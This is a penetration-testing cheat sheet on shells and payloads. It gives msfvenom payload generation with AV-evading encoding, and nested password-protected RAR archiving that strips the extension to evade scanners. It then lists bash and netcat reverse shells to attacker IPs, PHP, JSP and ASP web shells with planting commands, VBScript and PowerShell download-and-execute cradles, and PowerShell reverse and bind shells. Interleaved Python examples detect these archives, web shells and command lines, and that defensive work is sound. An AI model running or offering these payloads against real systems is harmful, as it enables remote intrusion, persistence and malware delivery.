๐ŸšShells & Payloads

Refer for additional payloads

Staged payload:

Executes in multiple stages: a small first stage connects back and fetches the rest of the payload, so it is more complex and requires a Metasploit handler (meterpreter-style listener).

windows/shell/reverse_tcp

Stageless payload:

The payload contains all the shellcode it needs to execute, so it is larger, but the shell can be caught with a plain netcat listener. Try this first.

windows/shell_reverse_tcp

Note the naming convention: a slash between the shell type and the connection type (shell/reverse_tcp) means staged; an underscore (shell_reverse_tcp) means stageless.

Payloads

To use encoding:

x86/shikata_ga_nai is a popular encoder
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
# add -i <n> to run the encoder for n iterations

Listener

Netcat cannot handle staged payloads; use a Metasploit handler for those.

To use a meterpreter listener use:

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;"

Archiving

Archiving the payload:

wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
rar a ~/test.rar -p ~/test.js

Removing the .RAR Extension

mv test.rar test

Archiving the Payload Again

rar a test2.rar -p test
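The nested-archive and extension-stripping steps above rely on scanners that trust the file name. The defensive counterpart is to identify archives by their magic bytes and keep unpacking until no archive remains. The following is an added example (not part of the original page): a small sniffer that recognises RAR4/RAR5, ZIP, 7z and gzip by signature and flags content that does not match its extension. The sample inputs are constructed byte strings, not real archives.

```python
import os

# Published file signatures for common archive formats (first bytes of the file).
ARCHIVE_SIGNATURES = [
    ("rar5", b"Rar!\x1a\x07\x01\x00"),
    ("rar4", b"Rar!\x1a\x07\x00"),
    ("zip", b"PK\x03\x04"),
    ("7z", b"7z\xbc\xaf\x27\x1c"),
    ("gzip", b"\x1f\x8b"),
]

# Extensions we expect an archive to carry; anything else is a mismatch worth a look.
ARCHIVE_EXTENSIONS = {".rar", ".zip", ".7z", ".gz", ".tgz"}


def sniff_archive(data):
    """Return the archive format implied by the leading bytes, or None."""
    for name, magic in ARCHIVE_SIGNATURES:
        if data.startswith(magic):
            return name
    return None


def classify_upload(filename, data):
    """Return (format, verdict) for a file, judging by content rather than name."""
    fmt = sniff_archive(data)
    ext = os.path.splitext(filename)[1].lower()
    if fmt is None:
        return None, "not an archive"
    if ext not in ARCHIVE_EXTENSIONS:
        # This is exactly the 'mv test.rar test' case: archive bytes, no archive extension.
        return fmt, "archive content with non-archive or missing extension: inspect"
    return fmt, "archive: unpack and scan contents (nested archives included)"


def triage_files(files):
    """files: {name: bytes}. Returns only the entries that need further inspection."""
    results = {}
    for name, data in files.items():
        fmt, verdict = classify_upload(name, data)
        if fmt is not None:
            results[name] = (fmt, verdict)
    return results


# Constructed samples: only signatures plus padding, not valid archives.
SAMPLE_FILES = {
    "test": b"Rar!\x1a\x07\x01\x00" + b"\x00" * 16,      # RAR5 with the extension removed
    "test2.rar": b"Rar!\x1a\x07\x00" + b"\x00" * 16,     # RAR4, normal name
    "test.js": b"alert(1);",                             # plain script, not an archive
    "report.pdf": b"PK\x03\x04" + b"\x00" * 16,          # ZIP bytes behind a .pdf name
}

if __name__ == "__main__":
    for name, (fmt, verdict) in triage_files(SAMPLE_FILES).items():
        print(f"{name}: {fmt} -> {verdict}")
```

The point of `classify_upload` is that the decision to unpack is driven by `sniff_archive`, never by the extension, so renaming `test.rar` to `test` changes nothing except adding a mismatch finding.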

Shells

  • Basic bash reverse shell:

bash -c 'bash -i >& /dev/tcp/10.10.14.37/9001 0>&1'

  • Reverse shell on Linux with netcat:

nc IP 4444 -e /bin/sh

  • Shell on Windows with Impacket's psexec.py (needs valid credentials):

psexec.py user:'password'@IP

  • Windows netcat:

nc.exe -e cmd.exe IP 4444

Web Shells

Code: php

<?php system($_REQUEST["cmd"]); ?>

Code: jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

Code: asp

<% eval request("cmd") %>

Default locations:

Web Server    Default Webroot
Apache        /var/www/html/
Nginx         /usr/local/nginx/html/
IIS           c:\inetpub\wwwroot\
XAMPP         C:\xampp\htdocs\

Example:

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

Then to access:

curl http://SERVER_IP:PORT/shell.php?cmd=id
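The three one-line web shells above are also what a defender should be hunting for in the default webroots listed in the table. The following is an added example, not code from the original page: a scanner that walks a webroot, reads only script files by extension, and reports which of the three patterns (PHP `system($_REQUEST...)`, JSP `Runtime.getRuntime().exec(request.getParameter(...))`, ASP `eval request(...)`) each file matches. The demo builds a constructed webroot in a temporary directory so it runs without a web server; the rule names and the `DEFAULT_WEBROOTS` list are assumptions for this example.

```python
import os
import re
import tempfile

# Signatures for the minimal web shells shown on this page. Constructed for the example;
# a production scanner would carry a larger, maintained rule set.
WEBSHELL_PATTERNS = {
    "php-system-request": re.compile(
        r"\b(?:system|passthru|shell_exec|exec)\s*\(\s*\$_(?:REQUEST|GET|POST)\b", re.I),
    "jsp-runtime-exec": re.compile(
        r"Runtime\.getRuntime\(\)\.exec\(\s*request\.getParameter\(", re.I),
    "asp-eval-request": re.compile(r"<%\s*eval\s+request\s*\(", re.I),
}

# Linux webroots from the table above; the Windows ones apply on IIS/XAMPP hosts.
DEFAULT_WEBROOTS = ["/var/www/html", "/usr/local/nginx/html"]

# Only server-side script files are worth reading; static assets are skipped.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".jsp", ".jspx", ".asp", ".aspx"}


def scan_file(path):
    """Return the rule names that match the file's contents ([] on read error)."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            content = fh.read()
    except OSError:
        return []
    return [name for name, rx in WEBSHELL_PATTERNS.items() if rx.search(content)]


def scan_webroot(root):
    """Walk a webroot and return {path: [matched rule names]} for suspicious files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            full = os.path.join(dirpath, fname)
            hits = scan_file(full)
            if hits:
                findings[full] = hits
    return findings


def demo():
    """Build a constructed webroot in a temp dir, scan it, return {basename: rules}."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "shell.php": '<?php system($_REQUEST["cmd"]); ?>',                       # from the page
            "cmd.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
            "c.asp": '<% eval request("cmd") %>',
            "index.php": '<?php echo "hello"; ?>',                                      # benign
            "notes.txt": 'system($_REQUEST["cmd"])',                                   # not a script ext
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        findings = scan_webroot(root)
        return {os.path.basename(p): hits for p, hits in findings.items()}


if __name__ == "__main__":
    # Real use: for root in DEFAULT_WEBROOTS: scan_webroot(root)
    for path, hits in demo().items():
        print(f"{path}: {', '.join(hits)}")
```

The extension filter keeps the scan cheap but is also its blind spot: a shell dropped with an unexpected extension that the server still executes (via a handler mapping or `.htaccess`) would be skipped, so pair this with a check of the server's handler configuration.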

VBScript Shell

Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.1.208/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.1.208 4445 -e cmd.exe"

or

CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.1.208/shell.ps1')"

PowerShell:

Reverse shells:

powershell -c "iwr -uri 10.10.14.22/nc64.exe -outfile %temp%\\n.exe"; %temp%\\n.exe -e cmd.exe 10.10.14.22 9001
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

Bind shell:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
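Every one-liner in the Shells, VBScript and PowerShell sections above leaves a distinctive process command line: `/dev/tcp/` redirection, netcat with `-e`, `System.Net.Sockets.TCPClient` / `TcpListener`, an `IEX ... DownloadString` or `iwr ... -outfile` cradle, and the `-w hidden` / `-ep bypass` switches. The following is an added example (not from the original page) of detection logic over process-creation command lines such as Sysmon Event ID 1 or auditd execve records; it serves both the Shells list and the PowerShell section. The log format (`timestamp host user cmdline`) and the sample lines are constructed for the example.

```python
import re

# Detection rules keyed to the shell one-liners on this page. Constructed for the
# example; each is (rule name, regex applied to the full command line).
SHELL_RULES = [
    ("bash-dev-tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    # nc / nc64 / nc.exe ... -e <shell>; '[^|;&]*' keeps the match inside one command.
    ("netcat-exec", re.compile(r"\bnc(?:64)?(?:\.exe)?\b[^|;&]*\s-e\s+\S*(?:sh|cmd)", re.I)),
    ("powershell-tcpclient", re.compile(r"System\.Net\.Sockets\.TCPClient", re.I)),
    ("powershell-tcplistener", re.compile(r"System\.Net\.Sockets\.TcpListener", re.I)),
    ("powershell-download-cradle", re.compile(r"\bIEX\b.*DownloadString\(|\biwr\b.*-outfile", re.I)),
    ("powershell-hidden-bypass", re.compile(
        r"-(?:w|WindowStyle)\s+hidden|-(?:ep|Exec(?:utionPolicy)?)\s+bypass", re.I)),
]


def detect(cmdline):
    """Return the names of all rules that fire on one command line."""
    return [name for name, rx in SHELL_RULES if rx.search(cmdline)]


def triage(log_text):
    """Parse 'timestamp host user cmdline' lines and return an alert per matching line."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmdline = line.split(" ", 3)
        hits = detect(cmdline)
        if hits:
            alerts.append({"time": ts, "host": host, "user": user, "rules": hits})
    return alerts


# Constructed process-creation records; the command lines are the page's own examples,
# plus two benign lines (a netcat port check and a harmless PowerShell call).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z web01 www-data bash -c 'bash -i >& /dev/tcp/10.10.14.37/9001 0>&1'
2024-05-01T10:00:05Z web01 www-data nc 10.10.14.37 4444 -e /bin/sh
2024-05-01T10:00:09Z web01 root nc -zv 10.0.0.5 443
2024-05-01T10:01:00Z ws07 alice powershell -c Get-Date
2024-05-01T10:01:30Z ws07 alice powershell -ep bypass -w hidden IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.1.208/shell.ps1')
2024-05-01T10:02:00Z ws07 alice nc.exe -e cmd.exe 10.8.1.208 4445
2024-05-01T10:02:10Z ws07 alice powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234)
2024-05-01T10:02:30Z ws07 bob powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start()
"""

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(f"{alert['time']} {alert['host']} {alert['user']}: {', '.join(alert['rules'])}")
```

Note what the rules do not catch: the `iwr ... -outfile %temp%\n.exe` line in the PowerShell section renames netcat, so the `netcat-exec` rule never sees the `nc` token and the download cradle rule is the only one that fires; a renamed binary is why a `-e <shell>` argument on any unknown executable, and the resulting outbound connection, deserve their own rule.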
